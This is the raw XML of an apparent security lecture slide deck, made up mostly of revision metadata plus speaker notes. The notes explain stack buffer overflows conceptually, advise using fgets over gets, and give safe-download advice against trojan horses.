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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId43"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="309" r:id="rId2"/>
    <p:sldId id="310" r:id="rId3"/>
    <p:sldId id="311" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="313" r:id="rId6"/>
    <p:sldId id="314" r:id="rId7"/>
    <p:sldId id="315" r:id="rId8"/>
    <p:sldId id="316" r:id="rId9"/>
    <p:sldId id="317" r:id="rId10"/>
    <p:sldId id="318" r:id="rId11"/>
    <p:sldId id="319" r:id="rId12"/>
    <p:sldId id="342" r:id="rId13"/>
    <p:sldId id="320" r:id="rId14"/>
    <p:sldId id="321" r:id="rId15"/>
    <p:sldId id="322" r:id="rId16"/>
    <p:sldId id="323" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="325" r:id="rId19"/>
    <p:sldId id="326" r:id="rId20"/>
    <p:sldId id="327" r:id="rId21"/>
    <p:sldId id="329" r:id="rId22"/>
    <p:sldId id="330" r:id="rId23"/>
    <p:sldId id="331" r:id="rId24"/>
    <p:sldId id="332" r:id="rId25"/>
    <p:sldId id="334" r:id="rId26"/>
    <p:sldId id="335" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="339" r:id="rId29"/>
    <p:sldId id="340" r:id="rId30"/>
    <p:sldId id="341" r:id="rId31"/>
    <p:sldId id="343" r:id="rId32"/>
    <p:sldId id="344" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
    <p:sldId id="277" r:id="rId35"/>
    <p:sldId id="278" r:id="rId36"/>
    <p:sldId id="279" r:id="rId37"/>
    <p:sldId id="287" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="289"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6600"/>
    <a:srgbClr val="0000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3" autoAdjust="0"/>
    <p:restoredTop sz="81625"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="90" y="5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6"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1548" y="4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3110EA16-4BAF-F142-BC92-F5D11DCF83C5}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{3110EA16-4BAF-F142-BC92-F5D11DCF83C5}" dt="2019-11-08T13:21:19.083" v="8" actId="1036"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{3110EA16-4BAF-F142-BC92-F5D11DCF83C5}" dt="2019-11-08T13:19:40.110" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1661794514" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{3110EA16-4BAF-F142-BC92-F5D11DCF83C5}" dt="2019-11-08T13:19:40.110" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1661794514" sldId="309"/>
            <ac:spMk id="5122" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{3110EA16-4BAF-F142-BC92-F5D11DCF83C5}" dt="2019-11-08T13:21:19.083" v="8" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="601332166" sldId="332"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{3110EA16-4BAF-F142-BC92-F5D11DCF83C5}" dt="2019-11-08T13:21:19.083" v="8" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="601332166" sldId="332"/>
            <ac:spMk id="201731" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}"/>
    <pc:docChg chg="custSel addSld modSld sldOrd">
      <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:47:15.869" v="109" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:20:25.957" v="30"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2561887603" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:12.560" v="36" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2594086363" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:12.560" v="36" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2594086363" sldId="277"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:20:26" v="31" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2594086363" sldId="277"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:18.873" v="38" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3087039654" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:18.873" v="38" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3087039654" sldId="278"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:24.184" v="40" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1324525054" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:24.184" v="40" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1324525054" sldId="279"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:20:26.009" v="32" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1324525054" sldId="279"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:22:39.434" v="46" actId="120"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574079570" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:22:39.434" v="46" actId="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574079570" sldId="286"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add ord">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:22:14.953" v="42"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="117208068" sldId="287"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:22:45.007" v="49" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4024713197" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:22:45.007" v="49" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024713197" sldId="288"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:21:58.809" v="41"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3042952540" sldId="289"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:47:15.869" v="109" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="429093573" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:47:15.869" v="109" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="429093573" sldId="310"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:19:16.873" v="20" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1717415595" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:18:48.369" v="12" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1717415595" sldId="343"/>
            <ac:spMk id="2" creationId="{FF88681E-BA87-435B-B30A-4CF1774EAF1F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:19:16.873" v="20" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1717415595" sldId="343"/>
            <ac:spMk id="3" creationId="{62779BC7-9413-4E09-A221-E309D5E71EAF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:20:11.137" v="29" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1203977355" sldId="344"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:19:38.749" v="23"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1203977355" sldId="344"/>
            <ac:spMk id="2" creationId="{FE13DE1E-B87F-4194-A886-BCE5FC2273BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{6C7A8CE6-7559-4B9A-A8A0-C6AC00141CC2}" dt="2020-04-13T20:20:11.137" v="29" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1203977355" sldId="344"/>
            <ac:spMk id="3" creationId="{206A77E9-222B-4F46-B6ED-EA98E2DC3226}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{98FE5E8D-0712-2D43-B6DC-530EE3781EC8}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{98FE5E8D-0712-2D43-B6DC-530EE3781EC8}" dt="2020-04-13T20:48:45.501" v="4" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{98FE5E8D-0712-2D43-B6DC-530EE3781EC8}" dt="2020-04-13T20:48:45.501" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3089235178" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{98FE5E8D-0712-2D43-B6DC-530EE3781EC8}" dt="2020-04-13T20:48:45.501" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3089235178" sldId="311"/>
            <ac:spMk id="88067" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{EA499CB7-5A4B-4640-A5CB-39649A9BA5B0}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{EA499CB7-5A4B-4640-A5CB-39649A9BA5B0}" dt="2019-11-07T21:56:02.955" v="36" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{EA499CB7-5A4B-4640-A5CB-39649A9BA5B0}" dt="2019-11-07T21:56:02.955" v="36" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2793406800" sldId="342"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{43C8920C-299B-4A85-A024-532E93BA97DE}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{43C8920C-299B-4A85-A024-532E93BA97DE}" dt="2022-01-14T15:37:13.784" v="1" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{43C8920C-299B-4A85-A024-532E93BA97DE}" dt="2022-01-14T15:37:13.784" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1661794514" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Vahid Heydari" userId="065589f3340e704f" providerId="LiveId" clId="{43C8920C-299B-4A85-A024-532E93BA97DE}" dt="2022-01-14T15:37:13.784" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1661794514" sldId="309"/>
            <ac:spMk id="512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2947" name="Rectangle 1027"/>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2948" name="Rectangle 1028"/>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2949" name="Rectangle 1029"/>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D1A35E30-0D53-FB4C-940F-0C0B0AA2B642}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166892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F3BFB270-0373-9A4D-A278-35C302F791E2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175583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94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9CBEC5AD-0DA2-8142-9827-8C06E966366A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178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8179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>User data is written into the allocated buffer by the subroutine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>If the data size is not checked, the return pointer can be overwritten by user data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s exploit places machine code in the buffer and overwrites the return pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>When the function returns, attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s code is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The data that the attacker sends usually consists of machine specific bytecode (low level binary instructions) to execute a command, plus a new address for the return pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>This address points back into the address space of the stack, causing the program to run the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>s instructions when it attempts to return from the subroutine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81964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There is a logic behind the output above. What attacker did was, he/she supplied an input of length greater than what buffer can hold and at a particular length of input the buffer overflow so took place that it overwrote the memory of integer ‘pass’. So despite of a wrong password, the value of ‘pass’ became non zero and hence root privileges were granted to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is more secure than gets (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(buffer, BUFFERSIZE , stdin)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349816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64938B08-CAD5-9E4E-9909-C549A46F40EA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you do download freeware or shareware, download from a known or trusted site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the files to a designated directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run a virus checker against the downloaded file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use an MD5 checker to validate the checksum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember that the majority of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> horse programs are downloaded from the internet.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
